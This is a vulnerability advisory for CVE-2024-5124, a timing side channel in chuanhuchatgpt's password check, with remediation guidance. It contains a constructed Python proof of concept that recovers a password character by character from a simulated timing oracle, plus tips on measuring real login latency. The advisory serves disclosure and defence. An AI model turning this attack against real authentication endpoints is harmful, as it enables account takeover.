CVE-2024-5124
Published: 06 June 2024
Summary
CVE-2024-5124 is a high-severity Observable Discrepancy (CWE-203) vulnerability in Gaizhenbiao Chuanhuchatgpt. Its CVSS base score is 7.5 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Password Guessing (T1110.001). The CVE ranks in the top 2.3% of CVEs by exploit likelihood (EPSS), is not currently listed in the CISA KEV catalog, and a public proof-of-concept is referenced.
This vulnerability is AI-related: it is categorised as Enterprise AI Assistants, in the Privacy and Disclosure risk domain.
Deeper analysis
A timing attack vulnerability exists in version 20240310 of the gaizhenbiao/chuanhuchatgpt repository, where the password supplied for a given username is checked with Python's == operator (the CVE text writes it as '='). Ordinary string equality is not constant-time: it checks the lengths first and then stops at the first differing position, so the time a failed login takes depends on how long a prefix of the guess is correct. That observable difference leaks information about the stored password, which is CWE-203 (Observable Discrepancy). The CVSS 7.5 score reflects a network-reachable, unauthenticated check with no user interaction, a high confidentiality impact and no integrity or availability impact.
An unauthenticated remote attacker exploits the flaw by timing repeated authentication attempts with crafted inputs: first guesses of varying length to find the password length, then, position by position, the candidate character whose attempt takes longest. This reduces the search from the full keyspace to roughly (alphabet size x length) attempts, ending in unauthorized access to the account. In practice the per-character difference is on the order of nanoseconds, so a remote attacker has to average many requests per candidate to separate the signal from network jitter; the attack is far more reliable from a low-latency vantage point, which is a caveat on the low attack complexity the CVSS vector assumes.
The referenced GitHub commit e46ec4ecd896bc3c88eb9a2f44e8593f3c6761b4 implements a fix for the affected password comparison logic, and the associated huntr.com bounty report documents the issue and its remediation. The standard Python remediation for this class of flaw is a constant-time comparison such as hmac.compare_digest (ideally over fixed-length digests, so the password length is not leaked either). The EPSS score has remained flat at 0.4613 with no material increase observed after disclosure.
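The following is an added example, not code from the chuanhuchatgpt project or from the advisory. It shows the vulnerable pattern (plain == on the password) next to the hardened form (hash, then hmac.compare_digest), and then runs the incremental guessing attack described above against both. The credential store, the username alice and the password are constructed for the example; measured latency is replaced by a deterministic cost oracle that models a short-circuiting comparison, so the attack is reproducible without network timing.

```python
"""Timing side channel in password comparison, and the constant-time fix.

Constructed example: the credential store, username and password below are
made up for illustration and do not reproduce chuanhuchatgpt's configuration.
"""
import hashlib
import hmac
import string
from typing import Callable, Optional

# Constructed credential store (assumption: one plaintext password per user).
CREDENTIALS = {"alice": "s3cret!"}
ALPHABET = string.ascii_letters + string.digits + string.punctuation


def check_password_vulnerable(username: str, candidate: str) -> bool:
    """The pattern the advisory describes: plain equality on the password.
    CPython's str equality checks the lengths, then compares the contents and
    returns at the first differing position, so the time it takes depends on
    how long a prefix of the candidate is correct."""
    stored = CREDENTIALS.get(username)
    return stored is not None and candidate == stored


def check_password_hardened(username: str, candidate: str) -> bool:
    """Standard remediation: hash both values to a fixed length, then compare
    with hmac.compare_digest. Hashing first also removes the length leak that
    compare_digest alone would keep (it returns early on unequal lengths)."""
    stored = CREDENTIALS.get(username)
    expected = hashlib.sha256((stored or "").encode()).digest()
    actual = hashlib.sha256(candidate.encode()).digest()
    # Run the comparison unconditionally so unknown users take the same path.
    equal = hmac.compare_digest(actual, expected)
    return equal and stored is not None


def leaky_compare_cost(stored: str, candidate: str) -> int:
    """Deterministic stand-in for the latency of a short-circuiting ==:
    one unit for the length check, then one per character examined."""
    if len(stored) != len(candidate):
        return 1
    cost = 1
    for a, b in zip(stored, candidate):
        cost += 1
        if a != b:
            break
    return cost


def constant_compare_cost(stored: str, candidate: str) -> int:
    """Stand-in for hash-then-compare_digest: cost independent of the inputs."""
    return 32


def recover_password(cost: Callable[[str], int], login: Callable[[str], bool],
                     alphabet: str = ALPHABET, max_len: int = 16) -> Optional[str]:
    """Incremental guessing against a timing oracle.

    cost(guess)  -> simulated time to check `guess` (the side channel)
    login(guess) -> True if `guess` is accepted (the normal response)
    Returns the password, or None when the oracle gives no usable signal.
    """
    # Step 1: the length. Only an equal-length guess gets past the length check.
    by_len = {n: cost("\x00" * n) for n in range(1, max_len + 1)}
    if len(set(by_len.values())) == 1:
        return None                                 # no length signal
    length = max(by_len, key=by_len.get)

    # Step 2: one position at a time. "\x00" is outside the alphabet, so the
    # padding never matches by accident; a full match is confirmed by login().
    known = ""
    while len(known) < length:
        pad = "\x00" * (length - len(known) - 1)
        trials = {c: known + c + pad for c in alphabet}
        for guess in trials.values():
            if login(guess):
                return guess
        costs = {c: cost(guess) for c, guess in trials.items()}
        if len(set(costs.values())) == 1:
            return None                             # no per-position signal
        known += max(costs, key=costs.get)           # slowest guess = longest correct prefix
    return None


def attack(hardened: bool) -> Optional[str]:
    """Run the incremental attack against the vulnerable or the hardened check."""
    stored = CREDENTIALS["alice"]
    if hardened:
        return recover_password(lambda g: constant_compare_cost(stored, g),
                                lambda g: check_password_hardened("alice", g))
    return recover_password(lambda g: leaky_compare_cost(stored, g),
                            lambda g: check_password_vulnerable("alice", g))


if __name__ == "__main__":
    print("vulnerable:", attack(hardened=False))   # recovers s3cret!
    print("hardened:  ", attack(hardened=True))    # None: no timing signal
```

Against the leaky comparison the attack needs on the order of 94 x 7 attempts instead of 94^7, and the final character is confirmed by the login response rather than by timing, which is also how a real attack ends. Against the hardened check the length probe already returns a flat profile and the incremental strategy has nothing to work with. A real measurement would replace the cost oracle with many timed requests per candidate, using the minimum or a low percentile rather than the mean to suppress jitter.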
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-46381
Vulnerability details
A timing attack vulnerability exists in the gaizhenbiao/chuanhuchatgpt repository, specifically within the password comparison logic. The vulnerability is present in version 20240310 of the software, where passwords are compared using Python's == operator (written '=' in the original CVE text). This method of comparison allows an attacker to guess passwords based on the timing of each character's comparison. The issue arises from the code segment that checks a password for a particular username, which can lead to the exposure of sensitive information to an unauthorized actor. An attacker exploiting this vulnerability could guess user passwords, compromising the security of the system.
- CWE(s)
- CWE-203: Observable Discrepancy
AI Security Analysis
- AI Category
- Enterprise AI Assistants
- Risk Domain
- Privacy and Disclosure
- OWASP Top 10 for LLMs 2025
- None mapped
- Classification Reason
- The vulnerability is in gaizhenbiao/chuanhuchatgpt, an open-source ChatGPT-like web UI and assistant interface for LLMs such as OpenAI and others, listed on an AI/ML bug bounty platform (huntr).
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The timing attack in password comparison enables Password Guessing (T1110.001): the attacker infers the password one character at a time from the response time of failed authentication attempts, so the guessing is incremental rather than a blind search of the whole keyspace.
Affected Assets
- gaizhenbiao/chuanhuchatgpt, version 20240310 (fix in commit e46ec4ecd896bc3c88eb9a2f44e8593f3c6761b4)
Mitigating Controls
Likely Mitigating Controls
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness type (CWE-203) cited in the NVD entry.
- Misdirection: normalize or falsify responses so that an observable discrepancy (here, the response time of a failed login) no longer distinguishes a near-miss from a wrong guess.
- Covert channel analysis: observable differences in system behavior can be modulated into storage or timing channels; analysing and constraining such channels catches a comparison whose duration depends on secret data.
- Uniform error handling: prevents attackers from using observable differences in error responses, including how quickly an error is returned, to infer internal system details or state.